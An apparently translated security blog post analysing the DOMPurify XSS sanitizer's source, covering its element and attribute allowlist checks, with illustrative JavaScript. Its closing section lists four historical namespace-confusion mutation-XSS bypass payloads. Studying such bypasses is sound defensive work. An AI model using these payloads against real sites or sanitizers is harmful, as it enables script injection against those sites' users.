Analysis of DOMPurify

2022-06-24 15:16:00 【Deen_】

0x00 Introduction to DOMPurify

DOMPurify is an open-source, DOM-based, fast XSS sanitizer. It takes HTML as input, parses it into a DOM, walks the element nodes and sanitizes each one, then outputs safe HTML.

GitHub repository: https://github.com/cure53/DOMPurify

Latest version at the time of writing: 2.2.8

0x01 Common usage

const createDOMPurify = require('dompurify');
const { JSDOM } = require('jsdom');

const window = new JSDOM('').window;
const DOMPurify = createDOMPurify(window);

const clean = DOMPurify.sanitize("<img/src=x onerror=alert(1)>");

After this code runs, clean holds <img src="x">

DOMPurify.sanitize is the most commonly used function. It also accepts a second parameter, a configuration object; see the official documentation for the available options.

0x02 Debugging setup

DOMPurify's source is written with ES6 syntax (import / export). I wanted to debug it under node from WebStorm, so a few extra steps are needed, as follows (see also: "A complete guide to using ES6 import / export in Node.js"):

1. Download all the code under https://github.com/cure53/DOMPurify/tree/main/src and change each file's extension to .mjs.
2. Write your own main.js with the following code:

import createDOMPurify from "./DOMPurify-main/src/purify.mjs";
import JSDOM from 'jsdom';

const window = new JSDOM.JSDOM('').window;
const DOMPurify = createDOMPurify(window);
const html = "<img/src=x onerror=alert(1)>";
console.log(DOMPurify.sanitize(html));

3. Start node with the --experimental-modules flag.

0x03 Walking through the sanitize code

Main code

The core of the sanitize function looks like this:

const nodeIterator = _createIterator(IN_PLACE ? dirty : body);

/* Now start iterating over the created document */
while ((currentNode = nodeIterator.nextNode())) {
  /* Fix IE's strange behavior with manipulated textNodes #89 */
  if (currentNode.nodeType === 3 && currentNode === oldNode) {
    continue;
  }

  /* Sanitize tags and elements */
  if (_sanitizeElements(currentNode)) {
    continue;
  }

  /* Shadow DOM detected, sanitize it */
  if (currentNode.content instanceof DocumentFragment) {
    _sanitizeShadowDOM(currentNode.content);
  }

  /* Check attributes, sanitize if necessary */
  _sanitizeAttributes(currentNode);

  oldNode = currentNode;
}

oldNode = null;

dirty is the object to be sanitized, that is, the data we passed in.

First, _createIterator together with the loop while ((currentNode = nodeIterator.nextNode())) walks the parsed input node by node. For example, <img src=x><svg src=x> yields two elements, img and svg.
The body of the while loop then runs once per node, with currentNode being the img element and then the svg element.
Two sanitization steps are applied to each node: _sanitizeElements and _sanitizeAttributes. If _sanitizeElements returns true, the node has been removed and the loop moves straight on to the next node.
As its name suggests, _sanitizeElements sanitizes the tag itself.
_sanitizeAttributes sanitizes the attributes of the tag.
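The traversal order can be illustrated without a real DOM. The following is only a sketch: the plain-object nodes and the iterateNodes generator are hypothetical stand-ins for the DOM and for the NodeIterator returned by _createIterator. Unlike a real NodeIterator, this toy does not cope with nodes being removed during the walk, and it visits the root container as well.

```javascript
// Toy stand-in for the DOM: each node is { nodeName, childNodes }.
// iterateNodes is a hypothetical helper, not part of DOMPurify.
function* iterateNodes(root) {
  // Pre-order (document order) walk: the node first, then its children.
  yield root;
  for (const child of root.childNodes) {
    yield* iterateNodes(child);
  }
}

// Rough model of what <img src=x><svg src=x> looks like once parsed into a body.
const body = {
  nodeName: 'BODY',
  childNodes: [
    { nodeName: 'IMG', childNodes: [] },
    { nodeName: 'SVG', childNodes: [] },
  ],
};

const visited = [];
for (const currentNode of iterateNodes(body)) {
  // In DOMPurify this is where _sanitizeElements and
  // _sanitizeAttributes would be called on currentNode.
  visited.push(currentNode.nodeName);
}

console.log(visited); // [ 'BODY', 'IMG', 'SVG' ]
```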

_sanitizeElements function

/* Check if tagname contains Unicode */
if (stringMatch(currentNode.nodeName, /[\u0080-\uFFFF]/)) {
  _forceRemove(currentNode);
  return true;
}

/* Now let's check the element's type and name */
const tagName = stringToLowerCase(currentNode.nodeName);

If the tag name contains any character in the range \u0080-\uFFFF (that is, non-ASCII), the node is removed outright. Otherwise the tag name is converted to lowercase.
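The check is easy to try in isolation. In this minimal sketch the regular expression is the one from the excerpt above, while normalizeTagName is a hypothetical helper that returns null where DOMPurify would call _forceRemove.

```javascript
// Same character class as in the excerpt: anything from U+0080 to U+FFFF.
const NON_ASCII = /[\u0080-\uFFFF]/;

// Hypothetical helper: returns null when the node would be removed,
// otherwise the lowercased tag name used for the allowlist lookup.
function normalizeTagName(nodeName) {
  if (NON_ASCII.test(nodeName)) {
    return null;
  }
  return nodeName.toLowerCase();
}

console.log(normalizeTagName('IMG'));          // img
console.log(normalizeTagName('scr\u0130pt')); // null (U+0130 is outside ASCII)
```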

    if (!ALLOWED_TAGS[tagName] || FORBID_TAGS[tagName]) {
      /* Keep content except for bad-listed elements */
      if (KEEP_CONTENT && !FORBID_CONTENTS[tagName]) {
        const parentNode = getParentNode(currentNode) || currentNode.parentNode;
        const childNodes = getChildNodes(currentNode) || currentNode.childNodes;

        if (childNodes && parentNode) {
          const childCount = childNodes.length;

          for (let i = childCount - 1; i >= 0; --i) {
            parentNode.insertBefore(
              cloneNode(childNodes[i], true),
              getNextSibling(currentNode)
            );
          }
        }
      }

      _forceRemove(currentNode);
      return true;
    }

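Tags that are not on the allowlist, or that are explicitly forbidden, are removed. When KEEP_CONTENT is enabled and the tag is not listed in FORBID_CONTENTS, the node's children are first re-inserted after it so that the content survives. The allowlist is defined in tags.js: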

export const html = freeze([
  'a',
  'abbr',
  'acronym',
  'address',
  'area',
  'article',
  'aside',
  'audio',
  'b',
  ......
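The effect of the allowlist combined with KEEP_CONTENT can be modelled on a toy tree. This is a sketch under assumptions: the three-entry ALLOWED_TAGS table, the plain-object nodes, and the filterChildren and serialize helpers are all hypothetical, FORBID_TAGS and FORBID_CONTENTS are not modelled, and the real code moves nodes in a live DOM rather than building a new list.

```javascript
// Hypothetical miniature allowlist; the real one is built from tags.js.
const ALLOWED_TAGS = { p: true, b: true, '#text': true };
const KEEP_CONTENT = true;

// Toy nodes: { nodeName, childNodes, text? }. Returns the sanitized child list.
function filterChildren(childNodes) {
  const result = [];
  for (const node of childNodes) {
    const kids = filterChildren(node.childNodes);
    if (ALLOWED_TAGS[node.nodeName.toLowerCase()]) {
      result.push({ ...node, childNodes: kids });
    } else if (KEEP_CONTENT) {
      // The disallowed wrapper is dropped; its sanitized children take its place.
      result.push(...kids);
    }
  }
  return result;
}

// Hypothetical helper that prints the toy tree back as markup.
function serialize(nodes) {
  return nodes
    .map((n) =>
      n.nodeName === '#text'
        ? n.text
        : `<${n.nodeName}>${serialize(n.childNodes)}</${n.nodeName}>`
    )
    .join('');
}

// Models <p><blink><b>hi</b></blink></p>
const tree = [
  { nodeName: 'p', childNodes: [
    { nodeName: 'blink', childNodes: [
      { nodeName: 'b', childNodes: [
        { nodeName: '#text', text: 'hi', childNodes: [] },
      ] },
    ] },
  ] },
];

console.log(serialize(filterChildren(tree))); // <p><b>hi</b></p>
```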

    /* Check whether element has a valid namespace */
    if (currentNode instanceof Element && !_checkValidNamespace(currentNode)) {
      _forceRemove(currentNode);
      return true;
    }

    if (
      (tagName === 'noscript' || tagName === 'noembed') &&
      regExpTest(/<\/no(script|embed)/i, currentNode.innerHTML)
    ) {
      _forceRemove(currentNode);
      return true;
    }

The namespace check comes next; it has been bypassed in the past. After it there is an extra check for noscript and noembed tags. It feels a little redundant to me, because neither tag is on the default allowlist, so the node has already been removed by the check above.
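The noscript / noembed condition can be exercised on its own. In this sketch the regular expression is copied from the excerpt, while hasNestedClosingTag is a hypothetical wrapper and the sample strings are made up for illustration.

```javascript
// Pattern from the excerpt: a closing </noscript or </noembed inside the content.
const CLOSING_NO_TAG = /<\/no(script|embed)/i;

// Hypothetical wrapper around the condition used in _sanitizeElements.
function hasNestedClosingTag(tagName, innerHTML) {
  return (
    (tagName === 'noscript' || tagName === 'noembed') &&
    CLOSING_NO_TAG.test(innerHTML)
  );
}

// A closing tag hidden inside an attribute value triggers removal.
console.log(
  hasNestedClosingTag('noscript', '<p title="</noscript><img src onerror=alert(1)>">')
); // true
console.log(hasNestedClosingTag('noscript', '<p>plain</p>')); // false
// Other tags are not subject to this check.
console.log(hasNestedClosingTag('div', '</noscript>')); // false
```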

_sanitizeAttributes function

First, every attribute, whatever it is, is removed from currentNode (unless a hook has set forceKeepAttr).

if (hookEvent.forceKeepAttr) {
  continue;
}

/* Remove attribute */
_removeAttribute(name, currentNode);

/* Did the hooks approve of the attribute? */
if (!hookEvent.keepAttr) {
  continue;
}

Then _isValidAttribute is called with the tag name, the attribute name and the attribute value to decide whether the attribute is valid.

const lcTag = currentNode.nodeName.toLowerCase();
if (!_isValidAttribute(lcTag, lcName, value)) {
  continue;
}

If the attribute is valid, setAttribute is called to put it back.
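The "remove everything, then restore what passes" pattern can be sketched with a Map standing in for the attribute list. The node shape, the sanitizeAttributes function and the isValid callback here are hypothetical stand-ins (the callback plays the role of _isValidAttribute), and hooks are left out.

```javascript
// Toy node: { nodeName, attributes: Map<string, string> }.
// isValid is a hypothetical stand-in for _isValidAttribute.
function sanitizeAttributes(node, isValid) {
  const lcTag = node.nodeName.toLowerCase();
  // Snapshot first, because the map is mutated while we walk it.
  const snapshot = [...node.attributes];
  for (const [name, value] of snapshot) {
    const lcName = name.toLowerCase();

    // Step 1: remove the attribute unconditionally.
    node.attributes.delete(name);

    // Step 2: an invalid attribute simply stays removed.
    if (!isValid(lcTag, lcName, value)) {
      continue;
    }

    // Step 3: a valid attribute is put back.
    node.attributes.set(name, value);
  }
}

const img = {
  nodeName: 'IMG',
  attributes: new Map([['src', 'x'], ['onerror', 'alert(1)']]),
};

// Hypothetical validator that only approves src.
sanitizeAttributes(img, (tag, name) => name === 'src');

console.log([...img.attributes.keys()]); // [ 'src' ]
```

Defaulting to removal means that an attribute nobody explicitly approved can never survive by accident.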

The key function is _isValidAttribute. You can step through it in a debugger and try to find a bypass... nice try...

      if (ALLOW_DATA_ATTR && regExpTest(DATA_ATTR, lcName)) {
        // This attribute is safe
      } else if (ALLOW_ARIA_ATTR && regExpTest(ARIA_ATTR, lcName)) {
        // This attribute is safe
        /* Otherwise, check the name is permitted */
      } else if (!ALLOWED_ATTR[lcName] || FORBID_ATTR[lcName]) {
        return false;

        /* Check value is safe. First, is attr inert? If so, is safe */
      } else if (URI_SAFE_ATTRIBUTES[lcName]) {
        // This attribute is safe
        /* Check no script, data or unknown possibly unsafe URI
          unless we know URI values are safe for that attribute */
      } else if (
        regExpTest(IS_ALLOWED_URI, stringReplace(value, ATTR_WHITESPACE, ''))
      ) {
        // This attribute is safe
        /* Keep image data URIs alive if src/xlink:href is allowed */
        /* Further prevent gadget XSS for dynamically built script tags */
      } else if (
        (lcName === 'src' || lcName === 'xlink:href' || lcName === 'href') &&
        lcTag !== 'script' &&
        stringIndexOf(value, 'data:') === 0 &&
        DATA_URI_TAGS[lcTag]
      ) {
        // This attribute is safe
        /* Allow unknown protocols: This provides support for links that
          are handled by protocol handlers which may be unknown ahead of
          time, e.g. fb:, spotify: */
      } else if (
        ALLOW_UNKNOWN_PROTOCOLS &&
        !regExpTest(IS_SCRIPT_OR_DATA, stringReplace(value, ATTR_WHITESPACE, ''))
      ) {
        // This attribute is safe
        /* Check for binary attributes */
        // eslint-disable-next-line no-negated-condition
      } else if (!value) {
        // Binary attributes are safe at this point
        /* Anything else, presume unsafe, do not add it back */
      } else {
        return false;
      }
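The decision chain can be condensed into a small standalone function. This is a simplified sketch, not the real implementation: the tables and regular expressions below are hypothetical stand-ins rather than the values DOMPurify ships, and FORBID_ATTR, URI_SAFE_ATTRIBUTES and ALLOW_UNKNOWN_PROTOCOLS are left out.

```javascript
// Simplified stand-ins, NOT the real DOMPurify tables or regexes.
const ALLOWED_ATTR = { src: true, href: true, disabled: true };
const DATA_ATTR = /^data-[\w-]+$/;
const ARIA_ATTR = /^aria-[\w-]+$/;
// Known-good scheme, or a value that does not start with "letters + colon".
const SAFE_URI = /^(?:https?:|mailto:|[^a-z]|[a-z+.-]+(?:[^a-z+.\-:]|$))/i;
const WHITESPACE = /[\u0000-\u0020]/g;
const DATA_URI_TAGS = { img: true };

function isValidAttribute(lcTag, lcName, value) {
  // data-* and aria-* names are accepted as they are.
  if (DATA_ATTR.test(lcName) || ARIA_ATTR.test(lcName)) return true;
  // Any other name must be on the allowlist.
  if (!ALLOWED_ATTR[lcName]) return false;
  // Strip whitespace before testing, so "java\tscript:" cannot slip through.
  if (SAFE_URI.test(value.replace(WHITESPACE, ''))) return true;
  // data: URIs are tolerated only on selected tags such as img.
  if (
    (lcName === 'src' || lcName === 'href') &&
    lcTag !== 'script' &&
    value.indexOf('data:') === 0 &&
    DATA_URI_TAGS[lcTag]
  ) {
    return true;
  }
  // An empty value means a boolean attribute; anything else is presumed unsafe.
  return !value;
}

console.log(isValidAttribute('img', 'onerror', 'alert(1)'));               // false
console.log(isValidAttribute('a', 'href', 'https://example.com'));         // true
console.log(isValidAttribute('a', 'href', 'java\tscript:alert(1)'));       // false
console.log(isValidAttribute('img', 'src', 'data:image/png;base64,AAAA')); // true
console.log(isValidAttribute('a', 'href', 'data:text/html,x'));            // false
console.log(isValidAttribute('button', 'disabled', ''));                   // true
```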

0x04 Historical bypasses

Past bypasses can be found in the project's pull requests and in the release changelogs, for example:

Bypass via namespace confusion: https://github.com/cure53/DOMPurify/pull/495

Payloads:

<form><math><mtext></form><form><mglyph><style></math><img src onerror=alert(1)>
<svg></p><style><a id="</style><img src=1 onerror=alert(1)>">
<math><mtext><table><mglyph><style><img src=1 onerror=alert(1)>">
<form><math><mtext></form><form><mglyph><svg><mtext><style><path id="</style><img onerror=alert(\'XSS\') src>">
